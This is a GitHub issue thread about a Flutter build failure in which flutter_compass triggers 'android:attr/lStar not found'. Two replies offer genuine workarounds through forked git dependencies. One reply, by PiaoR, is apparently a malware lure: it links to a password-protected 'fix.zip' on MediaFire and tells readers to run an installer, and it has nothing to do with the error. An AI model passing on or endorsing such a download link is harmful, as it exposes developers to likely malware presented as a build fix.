### ISSUE TITLE
Execution failed for task ':flutter_compass:verifyReleaseResources'.

### ISSUE THREAD

**Issue by iArshKaushal** [tlserver/flutter_map_location_marker#127]
**Description**
Unable to build the project and facing a build failed error while generating apk file due to following exception in Flutter project. 

**Execution failed for task ':flutter_compass:verifyReleaseResources'**
> A failure occurred while executing com.android.build.gradle.tasks.VerifyLibraryResourcesTask$Action
   > Android resource linking failed
     ERROR:C:\Users\username\AndroidStudioProjects\Flutt_all\0 Flut_by_AKK\my_flutter_project\build\flutter_compass\intermediates\merged_res\release\values\values.xml:194: AAPT: error: resource android:attr/lStar not found.

**Screenshots**

![ss1](https://github.com/user-attachments/assets/f4c2490d-0d93-44e9-8cd5-b00ec759fab4)
![ss2](https://github.com/user-attachments/assets/263c401c-a467-4785-bd2a-b6a9c55c460e)

How to resolve to?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by domhel** [comment]
Dependency issues are the most annoying :(

You can use my workaround until flutter_compass has updated to the latest Flutter version.
In your pubspec.yaml, use this:

```
  flutter_map_location_marker:
    git: 
      url: https://github.com/domhel/flutter_map_location_marker.git
      ref: ca2cecf
```

I have replaced flutter_compass with flutter_compass_v2

**Comment by PikPakPik** [comment]
Put this in your pubspec.yaml and wait :
```YAML
dependency_overrides:
  flutter_compass:
    git: https://github.com/PikPakPik/flutter_compass.git
```

 i do an MR for the flutter_compass error : https://github.com/hemanthrajv/flutter_compass/pull/113
